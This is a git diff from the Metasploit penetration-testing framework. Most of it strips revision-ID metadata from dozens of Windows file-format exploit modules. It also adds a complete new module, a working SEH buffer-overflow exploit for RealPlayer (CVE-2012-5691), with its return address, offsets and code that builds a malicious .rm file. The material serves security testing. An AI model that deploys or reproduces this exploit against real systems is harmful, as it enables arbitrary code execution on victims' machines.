$Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote 'SkD ', 'jduck', ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-0184' ], diff --git a/modules/exploits/windows/fileformat/feeddemon_opml.rb b/modules/exploits/windows/fileformat/feeddemon_opml.rb index 72f412c163..466c1e6749 100644 --- a/modules/exploits/windows/fileformat/feeddemon_opml.rb +++ b/modules/exploits/windows/fileformat/feeddemon_opml.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -35,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote 'dookie', # MSF Module 'jduck' # SEH + AlphanumMixed fixes ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-0546' ], diff --git a/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb b/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb index 9d4c07642c..25142e6fad 100644 --- a/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb +++ b/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -36,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote 'bannedit', # metasploit module 'Chris Evans' # Initial discovery and exploit ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '71104' ], diff --git a/modules/exploits/windows/fileformat/foxit_reader_launch.rb b/modules/exploits/windows/fileformat/foxit_reader_launch.rb index a698daff98..52b05457f3 100644 --- a/modules/exploits/windows/fileformat/foxit_reader_launch.rb +++ b/modules/exploits/windows/fileformat/foxit_reader_launch.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Francisco Falcon', # Discovery 'bannedit' # Metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE' , '2009-0837' ], diff --git a/modules/exploits/windows/fileformat/foxit_title_bof.rb b/modules/exploits/windows/fileformat/foxit_title_bof.rb index e905b7da55..703d1c5640 100644 --- a/modules/exploits/windows/fileformat/foxit_title_bof.rb +++ b/modules/exploits/windows/fileformat/foxit_title_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote NOTE: This exploit does not use javascript. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'dookie', # Discovered the bug diff --git a/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb b/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb index b2d3038e5b..3b6b83032e 100644 --- a/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb +++ b/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb @@ -27,7 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Richard Leahy', # Initial discovery 'X-h4ck', # msf module is based on his poc 'Tiago Henriques', # msf module - 'James Fitts' # clean ups + 'James Fitts ' # clean ups ], 'References' => [ diff --git a/modules/exploits/windows/fileformat/galan_fileformat_bof.rb b/modules/exploits/windows/fileformat/galan_fileformat_bof.rb index 5125e1d0a4..5bd79077df 100644 --- a/modules/exploits/windows/fileformat/galan_fileformat_bof.rb +++ b/modules/exploits/windows/fileformat/galan_fileformat_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Jeremy Brown <0xjbrown41[at]gmail.com>', 'loneferret', ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '60897' ], diff --git a/modules/exploits/windows/fileformat/gta_samp.rb b/modules/exploits/windows/fileformat/gta_samp.rb index 8569980220..26f6865d40 100644 --- a/modules/exploits/windows/fileformat/gta_samp.rb +++ b/modules/exploits/windows/fileformat/gta_samp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Silent_Dream', # Original discovery, MSF Module, template by mona.py ], - 'Version' => '$Revision$', 'References' => [ [ 'EDB', '17893' ] diff --git a/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb b/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb index ed1c77ce5f..0edfc9e4fd 100644 --- a/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb +++ b/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'bratax', 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-0564'], diff --git a/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb b/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb index ee12e55041..d084fe8c90 100644 --- a/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb +++ b/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'bratax', 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-0564' ], diff --git a/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb b/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb index 393389895b..0238ae08ac 100644 --- a/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb +++ b/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'Encrypt3d.M!nd', 'loneferret', 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-0133' ], diff --git a/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb b/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb index aa74b56039..f4087fa832 100644 --- a/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb +++ b/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -35,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote 'His0k4', 'jduck', ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-2485' ], diff --git a/modules/exploits/windows/fileformat/ideal_migration_ipj.rb b/modules/exploits/windows/fileformat/ideal_migration_ipj.rb index ac73742e7c..7fad269596 100644 --- a/modules/exploits/windows/fileformat/ideal_migration_ipj.rb +++ b/modules/exploits/windows/fileformat/ideal_migration_ipj.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'Dr_IDE', 'dookie', 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-4265' ], diff --git a/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb b/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb index 9e7d9fff68..12f4b03f30 100644 --- a/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb +++ b/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -39,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote 'mr_me ', # msf-fu 'juan vazquez' # more improvements ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2012-0897' ], diff --git a/modules/exploits/windows/fileformat/lotusnotes_lzh.rb b/modules/exploits/windows/fileformat/lotusnotes_lzh.rb index 995afaee94..7ecc6aecb5 100644 --- a/modules/exploits/windows/fileformat/lotusnotes_lzh.rb +++ b/modules/exploits/windows/fileformat/lotusnotes_lzh.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'binaryhouse.net', # original discovery 'alino <26alino[at]gmail.com>', # Metasploit module ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2011-1213'], diff --git a/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb b/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb index 18c82de3c2..fc25548054 100644 --- a/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb +++ b/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -33,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote 'acidgen', #found the vulnerability 'corelanc0d3r ' #rop exploit + msf module ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '72063'], diff --git a/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb b/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb index cf307e809b..232faab382 100644 --- a/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb +++ b/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.metasploit.com' ], diff --git a/modules/exploits/windows/fileformat/mediajukebox.rb b/modules/exploits/windows/fileformat/mediajukebox.rb index f6a05b8047..67d6978345 100644 --- a/modules/exploits/windows/fileformat/mediajukebox.rb +++ b/modules/exploits/windows/fileformat/mediajukebox.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Ron Henry ', 'dijital1', ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '55924' ], diff --git a/modules/exploits/windows/fileformat/microp_mppl.rb b/modules/exploits/windows/fileformat/microp_mppl.rb index fa47452b90..ef372786a8 100644 --- a/modules/exploits/windows/fileformat/microp_mppl.rb +++ b/modules/exploits/windows/fileformat/microp_mppl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,8 +22,7 @@ class Metasploit3 < Msf::Exploit::Remote arbitrary code execution under the context of the user. }, 'License' => MSF_LICENSE, - 'Author' => [ 'James Fitts' ], - 'Version' => '$Revision$', + 'Author' => [ 'James Fitts ' ], 'References' => [ [ 'OSVDB', '73627'], diff --git a/modules/exploits/windows/fileformat/millenium_mp3_pls.rb b/modules/exploits/windows/fileformat/millenium_mp3_pls.rb index 4442797f0c..85c74d3458 100644 --- a/modules/exploits/windows/fileformat/millenium_mp3_pls.rb +++ b/modules/exploits/windows/fileformat/millenium_mp3_pls.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'Molotov ', 'dookie', 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '56574' ], diff --git a/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb b/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb index 1255746bc7..9620228327 100644 --- a/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb +++ b/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb @@ -25,9 +25,8 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Madjix', # original discovery 'Tiago Henriques', # metasploit module - 'James Fitts' # clean ups + 'James Fitts ' # clean ups ], - 'Version' => '$Revision$', 'References' => [ [ 'EDB', '14373' ], diff --git a/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb b/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb index c966b79daf..6f6214a760 100644 --- a/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb +++ b/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote 'rick2600', #found the vulnerabilities 'corelanc0d3r ', #rop exploit + msf module ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '72101'], diff --git a/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb b/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb index 9c548a7c83..76cc8d3cf9 100644 --- a/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb +++ b/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -33,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote 'rick2600', #found the vulnerabilities 'corelanc0d3r ', #rop exploit + msf module ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '72102'], diff --git a/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb b/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb index b777d37f98..3e0b1b480f 100644 --- a/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb +++ b/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-4742' ], diff --git a/modules/exploits/windows/fileformat/mplayer_sami_bof.rb b/modules/exploits/windows/fileformat/mplayer_sami_bof.rb index c3e4fcba29..baa446304c 100644 --- a/modules/exploits/windows/fileformat/mplayer_sami_bof.rb +++ b/modules/exploits/windows/fileformat/mplayer_sami_bof.rb @@ -29,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Jacques Louw', # Vulnerability Discovery and PoC 'juan vazquez' # Metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'BID', '49149' ], diff --git a/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb b/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb index 5645104a92..e0486db53c 100644 --- a/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb +++ b/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -40,7 +36,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Sean Larsson', # original discovery 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE','2009-3129' ], diff --git a/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb b/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb index c53609244e..74c9a6c491 100644 --- a/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb +++ b/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -37,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Snake', # PoC 'jduck' # metasploit version ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0033' ], diff --git a/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb b/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb index f574bfc117..a9bb8d19dd 100644 --- a/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb +++ b/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -46,7 +42,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck', # Metasploit module 'DJ Manila Ice, Vesh, CA' # more office 2007 for the lulz ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-3333' ], diff --git a/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb b/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb index b60b700e38..c12b817625 100644 --- a/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb +++ b/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -36,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Yaniv Miron aka Lament of ilhack', 'jduck' # Metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-3970' ], diff --git a/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb b/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb index 9e2ae49f5e..7e40c4f300 100644 --- a/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb +++ b/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote user the user. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'Aniway', #Initial discovery (via ZDI) diff --git a/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb b/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb index 998d27454b..dd317eecd0 100644 --- a/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb +++ b/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-4776' ], diff --git a/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb b/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb index 554854f50f..e7b2940bc7 100644 --- a/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb +++ b/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'dean ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE','2008-1898' ], diff --git a/modules/exploits/windows/fileformat/mymp3player_m3u.rb b/modules/exploits/windows/fileformat/mymp3player_m3u.rb index 1e934ce539..6d14021cfc 100644 --- a/modules/exploits/windows/fileformat/mymp3player_m3u.rb +++ b/modules/exploits/windows/fileformat/mymp3player_m3u.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote 'n3w7u', # original 'm_101' ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '64580'], diff --git a/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb b/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb index 785d8a463c..98d938812d 100644 --- a/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb +++ b/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote This exploit does not use javascript. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'corelanc0d3r ', diff --git a/modules/exploits/windows/fileformat/orbital_viewer_orb.rb b/modules/exploits/windows/fileformat/orbital_viewer_orb.rb index 46a4fd1ce6..95496d38c2 100644 --- a/modules/exploits/windows/fileformat/orbital_viewer_orb.rb +++ b/modules/exploits/windows/fileformat/orbital_viewer_orb.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'BID', '38436' ], diff --git a/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb b/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb index 85250916bc..3933d96644 100644 --- a/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb +++ b/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-3214' ], diff --git a/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb b/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb index 87bf6d04be..5d8add038b 100644 --- a/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb +++ b/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -33,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote 'C4SS!0 G0M3S', # Vulnerability discovery and original exploit 'TecR0c ', # Metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'BID', '46059' ], diff --git a/modules/exploits/windows/fileformat/real_player_url_property_bof.rb b/modules/exploits/windows/fileformat/real_player_url_property_bof.rb new file mode 100644 index 0000000000..a9d911f362 --- /dev/null +++ b/modules/exploits/windows/fileformat/real_player_url_property_bof.rb @@ -0,0 +1,87 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::FILEFORMAT + include Msf::Exploit::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'RealPlayer RealMedia File Handling Buffer Overflow', + 'Description' => %q{ + This module exploits a stack based buffer overflow on RealPlayer <=15.0.6.14. + The vulnerability exists in the handling of real media files, due to the insecure + usage of the GetPrivateProfileString function to retrieve the URL property from an + InternetShortcut section. + + This module generates a malicious rm file which must be opened with RealPlayer via + drag and drop or double click methods. It has been tested successfully on Windows + XP SP3 with RealPlayer 15.0.5.109. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'suto ' # Vulnerability discovery, metasploit module + ], + 'References' => + [ + [ 'CVE', '2012-5691' ], + [ 'OSVDB', '88486' ], + [ 'BID', '56956' ], + [ 'URL', 'http://service.real.com/realplayer/security/12142012_player/en/' ] + ], + 'DefaultOptions' => + { + 'ExitFunction' => 'process' + }, + 'Platform' => 'win', + 'Payload' => + { + 'BadChars' => "\x00\x0a\x0d", + 'DisableNops' => true, + 'Space' => 2000 + }, + 'Targets' => + [ + [ 'Windows XP SP3 / Real Player 15.0.5.109', + { + 'Ret' => 0x63f2b4b5, # ppr from rpap3260.dll + 'OffsetOne' => 2312, # Open via double click + 'OffsetTwo' => 2964 # Open via drag and drop + } + ] + ], + 'Privileged' => false, + 'DisclosureDate' => 'Dec 14 2012', + 'DefaultTarget' => 0)) + + register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.rm']),], self.class) + + end + + def exploit + + buffer = payload.encoded + buffer << rand_text(target['OffsetOne'] - buffer.length) # Open the file via double click + buffer << generate_seh_record(target.ret) + buffer << Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-#{target['OffsetOne'] + 8}").encode_string + buffer << rand_text(target['OffsetTwo'] - buffer.length) # Open the file via drag and drop to the real player + buffer << generate_seh_record(target.ret) + buffer << Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-#{target['OffsetTwo'] + 8}").encode_string + buffer << rand_text(7000) # Generate exception + + content = "[InternetShortcut]\nURL=" + filecontent = content+buffer + + file_create(filecontent) + + end +end \ No newline at end of file diff --git a/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb b/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb index 58db221ce8..e584604a76 100644 --- a/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb +++ b/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-3861' ], diff --git a/modules/exploits/windows/fileformat/sascam_get.rb b/modules/exploits/windows/fileformat/sascam_get.rb index 48f19e9542..f77c640060 100644 --- a/modules/exploits/windows/fileformat/sascam_get.rb +++ b/modules/exploits/windows/fileformat/sascam_get.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'dean ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-6898' ], diff --git a/modules/exploits/windows/fileformat/scadaphone_zip.rb b/modules/exploits/windows/fileformat/scadaphone_zip.rb index 29e74c7c62..a6284944a8 100644 --- a/modules/exploits/windows/fileformat/scadaphone_zip.rb +++ b/modules/exploits/windows/fileformat/scadaphone_zip.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -35,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'mr_me ', # found + msf ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-4535' ], diff --git a/modules/exploits/windows/fileformat/somplplayer_m3u.rb b/modules/exploits/windows/fileformat/somplplayer_m3u.rb index 505353a818..cb9dec4e1b 100644 --- a/modules/exploits/windows/fileformat/somplplayer_m3u.rb +++ b/modules/exploits/windows/fileformat/somplplayer_m3u.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Rick2600', # Original Exploit 'dookie' # MSF Module ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '64368' ], diff --git a/modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb b/modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb index cb988ede4a..0beb3762c7 100644 --- a/modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb +++ b/modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote arbitrary code execution. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 